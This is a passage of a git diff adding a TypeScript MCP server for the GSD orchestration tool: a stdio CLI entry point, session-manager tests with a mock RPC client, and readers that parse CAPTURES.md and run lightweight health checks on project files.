+++ b/packages/mcp-server/src/cli.ts
@@ -0,0 +1,68 @@
+#!/usr/bin/env node
+
+/**
+ * @gsd-build/mcp-server CLI — stdio transport entry point.
+ *
+ * Connects the MCP server to stdin/stdout for use by Claude Code,
+ * Cursor, and other MCP-compatible clients.
+ */
+
+import { SessionManager } from './session-manager.js';
+import { createMcpServer } from './server.js';
+
+const MCP_PKG = '@modelcontextprotocol/sdk';
+
+async function main(): Promise<void> {
+  const sessionManager = new SessionManager();
+
+  // Create the configured MCP server with all 12 tools (6 session + 6 read-only)
+  const { server } = await createMcpServer(sessionManager);
+
+  // Dynamic import for StdioServerTransport (same TS subpath workaround)
+  const { StdioServerTransport } = await import(`${MCP_PKG}/server/stdio.js`);
+  const transport = new StdioServerTransport();
+
+  // Cleanup handler — stop all sessions before exiting
+  let cleaningUp = false;
+  async function cleanup(): Promise<void> {
+    if (cleaningUp) return;
+    cleaningUp = true;
+    process.stderr.write('[gsd-mcp-server] Shutting down...\n');
+    try {
+      await sessionManager.cleanup();
+    } catch {
+      // swallow cleanup errors
+    }
+    try {
+      await server.close();
+    } catch {
+      // swallow close errors
+    }
+    process.exit(0);
+  }
+
+  process.on('SIGTERM', () => void cleanup());
+  process.on('SIGINT', () => void cleanup());
+
+  // Handle stdin end — MCP client disconnected
+  process.stdin.on('end', () => void cleanup());
+
+  // Connect and start serving
+  try {
+    await server.connect(transport);
+    process.stderr.write('[gsd-mcp-server] MCP server started on stdio\n');
+  } catch (err) {
+    process.stderr.write(
+      `[gsd-mcp-server] Fatal: failed to start — ${err instanceof Error ? err.message : String(err)}\n`
+    );
+    await sessionManager.cleanup();
+    process.exit(1);
+  }
+}
+
+main().catch((err) => {
+  process.stderr.write(
+    `[gsd-mcp-server] Fatal: ${err instanceof Error ? err.message : String(err)}\n`
+  );
+  process.exit(1);
+});
diff --git a/packages/mcp-server/src/index.ts b/packages/mcp-server/src/index.ts
new file mode 100644
index 000000000..c1b837305
--- /dev/null
+++ b/packages/mcp-server/src/index.ts
@@ -0,0 +1,28 @@
+/**
+ * @gsd-build/mcp-server — MCP server for GSD orchestration and project state.
+ */
+
+export { SessionManager } from './session-manager.js';
+export { createMcpServer } from './server.js';
+export type {
+  SessionStatus,
+  ManagedSession,
+  ExecuteOptions,
+  PendingBlocker,
+  CostAccumulator,
+} from './types.js';
+export { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js';
+
+// Read-only state readers (usable without a running session)
+export { readProgress } from './readers/state.js';
+export type { ProgressResult } from './readers/state.js';
+export { readRoadmap } from './readers/roadmap.js';
+export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './readers/roadmap.js';
+export { readHistory } from './readers/metrics.js';
+export type { HistoryResult, MetricsUnit } from './readers/metrics.js';
+export { readCaptures } from './readers/captures.js';
+export type { CapturesResult, CaptureEntry } from './readers/captures.js';
+export { readKnowledge } from './readers/knowledge.js';
+export type { KnowledgeResult, KnowledgeEntry } from './readers/knowledge.js';
+export { runDoctorLite } from './readers/doctor-lite.js';
+export type { DoctorResult, DoctorIssue } from './readers/doctor-lite.js';
diff --git a/packages/mcp-server/src/mcp-server.test.ts b/packages/mcp-server/src/mcp-server.test.ts
new file mode 100644
index 000000000..6d7ce156e
--- /dev/null
+++ b/packages/mcp-server/src/mcp-server.test.ts
@@ -0,0 +1,628 @@
+/**
+ * @gsd-build/mcp-server — Integration and unit tests.
+ *
+ * Strategy: We cannot mock @gsd-build/rpc-client at the module level without
+ * --experimental-test-module-mocks. Instead we test by:
+ *
+ * 1. Subclassing SessionManager to inject a mock client factory
+ * 2. Testing event handling, state transitions, and error paths
+ * 3. Testing tool registration via createMcpServer
+ * 4. Testing CLI path resolution via static method
+ */
+
+import { describe, it, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { resolve } from 'node:path';
+import { EventEmitter } from 'node:events';
+
+import { SessionManager } from './session-manager.js';
+import { createMcpServer } from './server.js';
+import { MAX_EVENTS } from './types.js';
+import type { ManagedSession, CostAccumulator, PendingBlocker } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Mock RpcClient (duck-typed to match RpcClient interface)
+// ---------------------------------------------------------------------------
+
+class MockRpcClient {
+  started = false;
+  stopped = false;
+  aborted = false;
+  prompted: string[] = [];
+  private eventListeners: Array<(event: Record<string, unknown>) => void> = [];
+  uiResponses: Array<{ requestId: string; response: Record<string, unknown> }> = [];
+
+  /** Control — set to make start() reject */
+  startError: Error | null = null;
+  /** Control — set to make init() reject */
+  initError: Error | null = null;
+  /** Control — override sessionId from init */
+  initSessionId = 'mock-session-001';
+
+  cwd: string;
+  args: string[];
+
+  constructor(options?: Record<string, unknown>) {
+    this.cwd = (options?.cwd as string) ?? '';
+    this.args = (options?.args as string[]) ?? [];
+  }
+
+  async start(): Promise<void> {
+    if (this.startError) throw this.startError;
+    this.started = true;
+  }
+
+  async stop(): Promise<void> {
+    this.stopped = true;
+  }
+
+  async init(): Promise<{ sessionId: string; version: string }> {
+    if (this.initError) throw this.initError;
+    return { sessionId: this.initSessionId, version: '2.51.0' };
+  }
+
+  onEvent(listener: (event: Record<string, unknown>) => void): () => void {
+    this.eventListeners.push(listener);
+    return () => {
+      const idx = this.eventListeners.indexOf(listener);
+      if (idx >= 0) this.eventListeners.splice(idx, 1);
+    };
+  }
+
+  async prompt(message: string): Promise<void> {
+    this.prompted.push(message);
+  }
+
+  async abort(): Promise<void> {
+    this.aborted = true;
+  }
+
+  sendUIResponse(requestId: string, response: Record<string, unknown>): void {
+    this.uiResponses.push({ requestId, response });
+  }
+
+  /** Test helper — emit an event to all listeners */
+  emitEvent(event: Record<string, unknown>): void {
+    for (const listener of this.eventListeners) {
+      listener(event);
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// TestableSessionManager — injects mock clients without module mocking
+// ---------------------------------------------------------------------------
+
+/**
+ * Subclass that overrides startSession to use MockRpcClient instead of the
+ * real RpcClient. We directly construct the session object, mirroring the
+ * parent's logic but with our mock.
+ */ +class TestableSessionManager extends SessionManager { + /** The last mock client created */ + lastClient: MockRpcClient | null = null; + /** All mock clients */ + allClients: MockRpcClient[] = []; + /** Counter for unique session IDs across multiple sessions */ + private sessionCounter = 0; + /** Control: set to make startSession fail during init */ + nextInitError: Error | null = null; + /** Control: set to make startSession fail during start */ + nextStartError: Error | null = null; + + override async startSession(projectDir: string, options: { cliPath?: string; command?: string; model?: string; bare?: boolean } = {}): Promise { + if (!projectDir || projectDir.trim() === '') { + throw new Error('projectDir is required and cannot be empty'); + } + + const resolvedDir = resolve(projectDir); + + // Check duplicate via getSessionByDir + const existing = this.getSessionByDir(resolvedDir); + if (existing) { + throw new Error( + `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})` + ); + } + + const client = new MockRpcClient({ cwd: resolvedDir, args: [] }); + if (this.nextStartError) { + client.startError = this.nextStartError; + this.nextStartError = null; + } + if (this.nextInitError) { + client.initError = this.nextInitError; + this.nextInitError = null; + } + + this.sessionCounter++; + client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`; + this.lastClient = client; + this.allClients.push(client); + + // Create the session shell + const session: ManagedSession = { + sessionId: '', + projectDir: resolvedDir, + status: 'starting', + client: client as any, // duck-typed mock + events: [], + pendingBlocker: null, + cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now(), + }; + + // Insert into internal sessions map — access via protected method + this._putSession(resolvedDir, session); + + try { + await client.start(); + + 
const initResult = await client.init(); + session.sessionId = initResult.sessionId; + session.status = 'running'; + + // Wire event tracking using the same handleEvent logic as parent + session.unsubscribe = client.onEvent((event: Record) => { + this._handleEvent(session, event); + }); + + // Kick off auto-mode + const command = options.command ?? '/gsd auto'; + await client.prompt(command); + + return session.sessionId; + } catch (err) { + session.status = 'error'; + session.error = err instanceof Error ? err.message : String(err); + try { await client.stop(); } catch { /* swallow */ } + throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`); + } + } + + /** Expose internal session map insertion for testing */ + _putSession(key: string, session: ManagedSession): void { + // Access the private sessions map via any cast + (this as any).sessions.set(key, session); + } + + /** Expose handleEvent for testing */ + _handleEvent(session: ManagedSession, event: Record): void { + (this as any).handleEvent(session, event); + } +} + +// --------------------------------------------------------------------------- +// Test helpers +// --------------------------------------------------------------------------- + +let allManagers: TestableSessionManager[] = []; + +function createManager(): TestableSessionManager { + const mgr = new TestableSessionManager(); + allManagers.push(mgr); + return mgr; +} + +// --------------------------------------------------------------------------- +// SessionManager unit tests +// --------------------------------------------------------------------------- + +describe('SessionManager', () => { + let sm: TestableSessionManager; + + beforeEach(() => { + sm = createManager(); + }); + + afterEach(async () => { + for (const mgr of allManagers) { + await mgr.cleanup(); + } + allManagers = []; + }); + + it('startSession creates session and returns sessionId', async () => { + const sessionId = await 
sm.startSession('/tmp/test-project', { cliPath: '/usr/bin/gsd' }); + assert.equal(sessionId, 'mock-session-001'); + + const session = sm.getSession(sessionId); + assert.ok(session); + assert.equal(session.status, 'running'); + assert.equal(session.projectDir, resolve('/tmp/test-project')); + }); + + it('startSession sends /gsd auto by default', async () => { + await sm.startSession('/tmp/test-prompt', { cliPath: '/usr/bin/gsd' }); + assert.ok(sm.lastClient); + assert.deepEqual(sm.lastClient.prompted, ['/gsd auto']); + }); + + it('startSession sends custom command when provided', async () => { + await sm.startSession('/tmp/test-cmd', { cliPath: '/usr/bin/gsd', command: '/gsd auto --resume' }); + assert.ok(sm.lastClient); + assert.deepEqual(sm.lastClient.prompted, ['/gsd auto --resume']); + }); + + it('startSession rejects duplicate projectDir', async () => { + await sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' }); + await assert.rejects( + () => sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Session already active')); + return true; + }, + ); + }); + + it('startSession rejects empty projectDir', async () => { + await assert.rejects( + () => sm.startSession('', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('projectDir is required')); + return true; + }, + ); + }); + + it('startSession sets error status on start() failure', async () => { + sm.nextStartError = new Error('spawn failed'); + + await assert.rejects( + () => sm.startSession('/tmp/fail-start', { cliPath: '/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Failed to start session')); + assert.ok(err.message.includes('spawn failed')); + return true; + }, + ); + }); + + it('startSession sets error status on init() failure', async () => { + sm.nextInitError = new Error('handshake failed'); + + await assert.rejects( + () => sm.startSession('/tmp/fail-init', { cliPath: 
'/usr/bin/gsd' }), + (err: Error) => { + assert.ok(err.message.includes('Failed to start session')); + assert.ok(err.message.includes('handshake failed')); + return true; + }, + ); + }); + + it('getSession returns undefined for unknown sessionId', () => { + const result = sm.getSession('nonexistent-id'); + assert.equal(result, undefined); + }); + + it('getSessionByDir returns session for known dir', async () => { + await sm.startSession('/tmp/by-dir', { cliPath: '/usr/bin/gsd' }); + const session = sm.getSessionByDir('/tmp/by-dir'); + assert.ok(session); + assert.equal(session.sessionId, 'mock-session-001'); + }); + + it('resolveBlocker errors when no pending blocker', async () => { + const sessionId = await sm.startSession('/tmp/no-blocker', { cliPath: '/usr/bin/gsd' }); + await assert.rejects( + () => sm.resolveBlocker(sessionId, 'some response'), + (err: Error) => { + assert.ok(err.message.includes('No pending blocker')); + return true; + }, + ); + }); + + it('resolveBlocker errors for unknown session', async () => { + await assert.rejects( + () => sm.resolveBlocker('unknown-session', 'some response'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); + + it('resolveBlocker clears pendingBlocker and sends UI response', async () => { + const sessionId = await sm.startSession('/tmp/blocker-resolve', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // Simulate a blocking UI request event + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-42', + method: 'select', + title: 'Pick an option', + }); + + const session = sm.getSession(sessionId)!; + assert.ok(session.pendingBlocker); + assert.equal(session.status, 'blocked'); + + // Resolve the blocker + await sm.resolveBlocker(sessionId, 'option-a'); + + assert.equal(session.pendingBlocker, null); + assert.equal(session.status, 'running'); + assert.equal(client.uiResponses.length, 1); + assert.equal(client.uiResponses[0].requestId, 
'req-42'); + }); + + it('cancelSession calls abort + stop on client', async () => { + const sessionId = await sm.startSession('/tmp/cancel-test', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + await sm.cancelSession(sessionId); + + assert.ok(client.aborted); + assert.ok(client.stopped); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'cancelled'); + }); + + it('cancelSession errors for unknown session', async () => { + await assert.rejects( + () => sm.cancelSession('unknown'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); + + it('cleanup stops all active sessions', async () => { + await sm.startSession('/tmp/cleanup-1', { cliPath: '/usr/bin/gsd' }); + await sm.startSession('/tmp/cleanup-2', { cliPath: '/usr/bin/gsd' }); + + assert.equal(sm.allClients.length, 2); + + await sm.cleanup(); + + for (const client of sm.allClients) { + assert.ok(client.stopped, 'Client should be stopped after cleanup'); + } + }); + + it('event ring buffer caps at MAX_EVENTS', async () => { + const sessionId = await sm.startSession('/tmp/ring-buffer', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + for (let i = 0; i < MAX_EVENTS + 20; i++) { + client.emitEvent({ type: 'tool_use', index: i }); + } + + const session = sm.getSession(sessionId)!; + assert.equal(session.events.length, MAX_EVENTS); + // Oldest events trimmed — first event index should be 20 + assert.equal((session.events[0] as Record).index, 20); + }); + + it('blocker detection: non-fire-and-forget extension_ui_request sets pendingBlocker', async () => { + const sessionId = await sm.startSession('/tmp/blocker-detect', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // 'select' is not in FIRE_AND_FORGET_METHODS + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-99', + method: 'select', + title: 'Choose wisely', + }); + + const session = sm.getSession(sessionId)!; + 
assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + assert.equal(session.pendingBlocker.id, 'req-99'); + assert.equal(session.pendingBlocker.method, 'select'); + }); + + it('fire-and-forget methods do not set pendingBlocker', async () => { + const sessionId = await sm.startSession('/tmp/fire-forget', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + // 'notify' is fire-and-forget — on its own (no terminal prefix) should not block + client.emitEvent({ + type: 'extension_ui_request', + id: 'req-100', + method: 'notify', + message: 'Just a notification', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'running'); + assert.equal(session.pendingBlocker, null); + }); + + it('terminal detection: auto-mode stopped sets status to completed', async () => { + const sessionId = await sm.startSession('/tmp/terminal', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'extension_ui_request', + method: 'notify', + message: 'Auto-mode stopped — all tasks complete', + id: 'term-1', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'completed'); + }); + + it('terminal detection with blocked: message sets status to blocked', async () => { + const sessionId = await sm.startSession('/tmp/terminal-blocked', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'extension_ui_request', + method: 'notify', + message: 'Auto-mode stopped — blocked: needs user input', + id: 'block-1', + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'blocked'); + assert.ok(session.pendingBlocker); + }); + + it('cost tracking: cumulative-max from cost_update events', async () => { + const sessionId = await sm.startSession('/tmp/cost-track', { cliPath: '/usr/bin/gsd' }); + const client = sm.lastClient!; + + client.emitEvent({ + type: 'cost_update', + cumulativeCost: 0.05, + tokens: 
{ input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 }, + }); + + client.emitEvent({ + type: 'cost_update', + cumulativeCost: 0.12, + tokens: { input: 2500, output: 800, cacheRead: 150, cacheWrite: 300 }, + }); + + const session = sm.getSession(sessionId)!; + assert.equal(session.cost.totalCost, 0.12); + assert.equal(session.cost.tokens.input, 2500); + assert.equal(session.cost.tokens.output, 800); + assert.equal(session.cost.tokens.cacheRead, 200); // First was higher + assert.equal(session.cost.tokens.cacheWrite, 300); // Second was higher + }); + + it('getResult returns HeadlessJsonResult-shaped object', async () => { + const sessionId = await sm.startSession('/tmp/result-shape', { cliPath: '/usr/bin/gsd' }); + const result = sm.getResult(sessionId); + + assert.equal(result.sessionId, sessionId); + assert.equal(result.projectDir, resolve('/tmp/result-shape')); + assert.equal(result.status, 'running'); + assert.equal(typeof result.durationMs, 'number'); + assert.ok(result.cost); + assert.ok(Array.isArray(result.recentEvents)); + assert.equal(result.pendingBlocker, null); + assert.equal(result.error, null); + }); + + it('getResult errors for unknown session', () => { + assert.throws( + () => sm.getResult('unknown'), + (err: Error) => { + assert.ok(err.message.includes('Session not found')); + return true; + }, + ); + }); +}); + +// --------------------------------------------------------------------------- +// CLI path resolution tests +// --------------------------------------------------------------------------- + +describe('SessionManager.resolveCLIPath', () => { + const originalGsdPath = process.env['GSD_CLI_PATH']; + const originalPath = process.env['PATH']; + + afterEach(() => { + if (originalGsdPath !== undefined) { + process.env['GSD_CLI_PATH'] = originalGsdPath; + } else { + delete process.env['GSD_CLI_PATH']; + } + if (originalPath !== undefined) { + process.env['PATH'] = originalPath; + } + }); + + it('GSD_CLI_PATH env var takes precedence', () 
=> { + process.env['GSD_CLI_PATH'] = '/custom/path/to/gsd'; + const result = SessionManager.resolveCLIPath(); + assert.equal(result, resolve('/custom/path/to/gsd')); + }); + + it('throws when GSD_CLI_PATH not set and which fails', () => { + delete process.env['GSD_CLI_PATH']; + process.env['PATH'] = '/nonexistent'; + assert.throws( + () => SessionManager.resolveCLIPath(), + (err: Error) => { + assert.ok(err.message.includes('Cannot find GSD CLI')); + return true; + }, + ); + }); +}); + +// --------------------------------------------------------------------------- +// Tool registration tests (via createMcpServer) +// --------------------------------------------------------------------------- + +describe('createMcpServer tool registration', () => { + let sm: TestableSessionManager; + + beforeEach(() => { + sm = createManager(); + }); + + afterEach(async () => { + for (const mgr of allManagers) { + await mgr.cleanup(); + } + allManagers = []; + }); + + it('creates server successfully with all required methods', async () => { + const { server } = await createMcpServer(sm); + assert.ok(server); + assert.ok(typeof server.connect === 'function'); + assert.ok(typeof server.close === 'function'); + }); + + it('gsd_execute flow returns sessionId on success', async () => { + const sessionId = await sm.startSession('/tmp/tool-exec', { cliPath: '/usr/bin/gsd' }); + assert.equal(typeof sessionId, 'string'); + assert.ok(sessionId.length > 0); + }); + + it('gsd_status flow returns correct shape', async () => { + const sessionId = await sm.startSession('/tmp/tool-status', { cliPath: '/usr/bin/gsd' }); + const session = sm.getSession(sessionId)!; + + assert.equal(typeof session.status, 'string'); + assert.ok(Array.isArray(session.events)); + assert.ok(session.cost); + assert.equal(typeof session.startTime, 'number'); + }); + + it('gsd_resolve_blocker flow returns error when no blocker', async () => { + const sessionId = await sm.startSession('/tmp/tool-resolve', { cliPath: 
'/usr/bin/gsd' }); + await assert.rejects( + () => sm.resolveBlocker(sessionId, 'fix'), + (err: Error) => { + assert.ok(err.message.includes('No pending blocker')); + return true; + }, + ); + }); + + it('gsd_result flow returns HeadlessJsonResult shape', async () => { + const sessionId = await sm.startSession('/tmp/tool-result', { cliPath: '/usr/bin/gsd' }); + const result = sm.getResult(sessionId); + + assert.ok('sessionId' in result); + assert.ok('projectDir' in result); + assert.ok('status' in result); + assert.ok('durationMs' in result); + assert.ok('cost' in result); + assert.ok('recentEvents' in result); + assert.ok('pendingBlocker' in result); + assert.ok('error' in result); + }); + + it('gsd_cancel flow marks session as cancelled', async () => { + const sessionId = await sm.startSession('/tmp/tool-cancel', { cliPath: '/usr/bin/gsd' }); + await sm.cancelSession(sessionId); + const session = sm.getSession(sessionId)!; + assert.equal(session.status, 'cancelled'); + }); +}); diff --git a/packages/mcp-server/src/readers/captures.ts b/packages/mcp-server/src/readers/captures.ts new file mode 100644 index 000000000..9cbd71570 --- /dev/null +++ b/packages/mcp-server/src/readers/captures.ts @@ -0,0 +1,119 @@ +// GSD MCP Server — captures reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type CaptureStatus = 'pending' | 'triaged' | 'resolved'; +export type CaptureClassification = + | 'quick-task' | 'inject' | 'defer' | 'replan' | 'note' | 'stop' | 'backtrack'; + +export interface CaptureEntry { + id: string; + text: string; + timestamp: string; + status: CaptureStatus; + classification: CaptureClassification | null; + resolution: string | null; + rationale: string | null; + 
resolvedAt: string | null; + milestone: string | null; + executed: string | null; +} + +export interface CapturesResult { + captures: CaptureEntry[]; + counts: { + total: number; + pending: number; + resolved: number; + actionable: number; + }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseCapturesMarkdown(content: string): CaptureEntry[] { + const entries: CaptureEntry[] = []; + + // Split on H3 headers: ### CAP-xxxxxxxx + const sections = content.split(/(?=^### CAP-)/m); + + for (const section of sections) { + const idMatch = section.match(/^### (CAP-[\da-f]+)/); + if (!idMatch) continue; + + const id = idMatch[1]; + const field = (label: string): string | null => { + const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i'); + const m = section.match(re); + return m ? m[1].trim() : null; + }; + + const status = (field('Status') ?? 'pending').toLowerCase() as CaptureStatus; + const classification = field('Classification') as CaptureClassification | null; + + entries.push({ + id, + text: field('Text') ?? '', + timestamp: field('Captured') ?? 
'', + status, + classification, + resolution: field('Resolution'), + rationale: field('Rationale'), + resolvedAt: field('Resolved'), + milestone: field('Milestone'), + executed: field('Executed'), + }); + } + + return entries; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +const ACTIONABLE_CLASSIFICATIONS = new Set(['quick-task', 'inject', 'replan']); + +export function readCaptures( + projectDir: string, + filter: 'all' | 'pending' | 'actionable' = 'all', +): CapturesResult { + const gsd = resolveGsdRoot(projectDir); + const capturesPath = resolveRootFile(gsd, 'CAPTURES.md'); + + if (!existsSync(capturesPath)) { + return { captures: [], counts: { total: 0, pending: 0, resolved: 0, actionable: 0 } }; + } + + const content = readFileSync(capturesPath, 'utf-8'); + let captures = parseCapturesMarkdown(content); + + // Compute counts before filtering + const counts = { + total: captures.length, + pending: captures.filter((c) => c.status === 'pending').length, + resolved: captures.filter((c) => c.status === 'resolved').length, + actionable: captures.filter( + (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification), + ).length, + }; + + // Apply filter + if (filter === 'pending') { + captures = captures.filter((c) => c.status === 'pending'); + } else if (filter === 'actionable') { + captures = captures.filter( + (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification), + ); + } + + return { captures, counts }; +} diff --git a/packages/mcp-server/src/readers/doctor-lite.ts b/packages/mcp-server/src/readers/doctor-lite.ts new file mode 100644 index 000000000..8b826090c --- /dev/null +++ b/packages/mcp-server/src/readers/doctor-lite.ts @@ -0,0 +1,225 @@ +// GSD MCP Server — lightweight structural health checks +// Copyright (c) 2026 Jeremy McSpadden + +import { existsSync, 
readFileSync } from 'node:fs'; +import { + resolveGsdRoot, + resolveRootFile, + findMilestoneIds, + resolveMilestoneFile, + resolveMilestoneDir, + findSliceIds, + resolveSliceFile, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type Severity = 'info' | 'warning' | 'error'; + +export interface DoctorIssue { + severity: Severity; + code: string; + scope: 'project' | 'milestone' | 'slice' | 'task'; + unitId: string; + message: string; + file?: string; +} + +export interface DoctorResult { + ok: boolean; + issues: DoctorIssue[]; + counts: { error: number; warning: number; info: number }; +} + +// --------------------------------------------------------------------------- +// Check implementations +// --------------------------------------------------------------------------- + +function checkProjectLevel(gsdRoot: string, issues: DoctorIssue[]): void { + // PROJECT.md should exist + const projectPath = resolveRootFile(gsdRoot, 'PROJECT.md'); + if (!existsSync(projectPath)) { + issues.push({ + severity: 'warning', + code: 'missing_project_md', + scope: 'project', + unitId: '', + message: 'PROJECT.md is missing — project lacks a description', + file: projectPath, + }); + } + + // STATE.md should exist if milestones exist + const milestones = findMilestoneIds(gsdRoot); + if (milestones.length > 0) { + const statePath = resolveRootFile(gsdRoot, 'STATE.md'); + if (!existsSync(statePath)) { + issues.push({ + severity: 'warning', + code: 'missing_state_md', + scope: 'project', + unitId: '', + message: 'STATE.md is missing — run /gsd status to regenerate', + file: statePath, + }); + } + } +} + +function checkMilestoneLevel(gsdRoot: string, mid: string, issues: DoctorIssue[]): void { + const mDir = resolveMilestoneDir(gsdRoot, mid); + if (!mDir) { + issues.push({ + severity: 'error', + code: 
'missing_milestone_dir', + scope: 'milestone', + unitId: mid, + message: `Milestone directory for ${mid} not found`, + }); + return; + } + + // CONTEXT.md should exist + const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT'); + if (!ctxPath || !existsSync(ctxPath)) { + // Check for draft + const draftPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT-DRAFT'); + if (!draftPath || !existsSync(draftPath)) { + issues.push({ + severity: 'warning', + code: 'missing_context', + scope: 'milestone', + unitId: mid, + message: `${mid} has no CONTEXT.md — milestone lacks defined scope`, + }); + } + } + + // ROADMAP.md should exist if slices exist + const sliceIds = findSliceIds(gsdRoot, mid); + if (sliceIds.length > 0) { + const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP'); + if (!roadmapPath || !existsSync(roadmapPath)) { + issues.push({ + severity: 'warning', + code: 'missing_roadmap', + scope: 'milestone', + unitId: mid, + message: `${mid} has ${sliceIds.length} slices but no ROADMAP.md`, + }); + } + } + + // Check if all slices done but no SUMMARY + if (sliceIds.length > 0) { + const allDone = sliceIds.every((sid) => { + const tasks = findTaskFiles(gsdRoot, mid, sid); + return tasks.length > 0 && tasks.every((t) => t.hasSummary); + }); + const summaryPath = resolveMilestoneFile(gsdRoot, mid, 'SUMMARY'); + if (allDone && (!summaryPath || !existsSync(summaryPath))) { + issues.push({ + severity: 'error', + code: 'all_slices_done_missing_summary', + scope: 'milestone', + unitId: mid, + message: `${mid} has all slices completed but no SUMMARY.md`, + }); + } + } +} + +function checkSliceLevel( + gsdRoot: string, mid: string, sid: string, issues: DoctorIssue[], +): void { + const unitId = `${mid}/${sid}`; + + // PLAN.md should exist + const planPath = resolveSliceFile(gsdRoot, mid, sid, 'PLAN'); + if (!planPath || !existsSync(planPath)) { + issues.push({ + severity: 'error', + code: 'missing_slice_plan', + scope: 'slice', + unitId, + message: `${unitId} has 
no PLAN.md`, + }); + } + + // Tasks should have plans + const tasks = findTaskFiles(gsdRoot, mid, sid); + for (const task of tasks) { + const taskUnitId = `${unitId}/${task.id}`; + if (!task.hasPlan) { + issues.push({ + severity: 'warning', + code: 'missing_task_plan', + scope: 'task', + unitId: taskUnitId, + message: `${taskUnitId} has a summary but no plan file`, + }); + } + } + + // Check for empty slice (directory exists but no tasks or plan) + if (tasks.length === 0 && (!planPath || !existsSync(planPath))) { + issues.push({ + severity: 'warning', + code: 'empty_slice', + scope: 'slice', + unitId, + message: `${unitId} has no plan and no tasks — may be abandoned`, + }); + } +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function runDoctorLite(projectDir: string, scope?: string): DoctorResult { + const gsdRoot = resolveGsdRoot(projectDir); + const issues: DoctorIssue[] = []; + + if (!existsSync(gsdRoot)) { + return { + ok: true, + issues: [{ + severity: 'info', + code: 'no_gsd_directory', + scope: 'project', + unitId: '', + message: 'No .gsd/ directory found — project not initialized', + }], + counts: { error: 0, warning: 0, info: 1 }, + }; + } + + // Project-level checks + checkProjectLevel(gsdRoot, issues); + + // Milestone + slice checks + const milestoneIds = scope + ? 
findMilestoneIds(gsdRoot).filter((id) => id === scope) + : findMilestoneIds(gsdRoot); + + for (const mid of milestoneIds) { + checkMilestoneLevel(gsdRoot, mid, issues); + + const sliceIds = findSliceIds(gsdRoot, mid); + for (const sid of sliceIds) { + checkSliceLevel(gsdRoot, mid, sid, issues); + } + } + + const counts = { + error: issues.filter((i) => i.severity === 'error').length, + warning: issues.filter((i) => i.severity === 'warning').length, + info: issues.filter((i) => i.severity === 'info').length, + }; + + return { ok: counts.error === 0, issues, counts }; +} diff --git a/packages/mcp-server/src/readers/index.ts b/packages/mcp-server/src/readers/index.ts new file mode 100644 index 000000000..d5b3368c7 --- /dev/null +++ b/packages/mcp-server/src/readers/index.ts @@ -0,0 +1,16 @@ +// GSD MCP Server — readers barrel export +// Copyright (c) 2026 Jeremy McSpadden + +export { resolveGsdRoot, resolveRootFile } from './paths.js'; +export { readProgress } from './state.js'; +export type { ProgressResult } from './state.js'; +export { readRoadmap } from './roadmap.js'; +export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './roadmap.js'; +export { readHistory } from './metrics.js'; +export type { HistoryResult, MetricsUnit } from './metrics.js'; +export { readCaptures } from './captures.js'; +export type { CapturesResult, CaptureEntry } from './captures.js'; +export { readKnowledge } from './knowledge.js'; +export type { KnowledgeResult, KnowledgeEntry } from './knowledge.js'; +export { runDoctorLite } from './doctor-lite.js'; +export type { DoctorResult, DoctorIssue } from './doctor-lite.js'; diff --git a/packages/mcp-server/src/readers/knowledge.ts b/packages/mcp-server/src/readers/knowledge.ts new file mode 100644 index 000000000..134df44e0 --- /dev/null +++ b/packages/mcp-server/src/readers/knowledge.ts @@ -0,0 +1,111 @@ +// GSD MCP Server — knowledge base reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } 
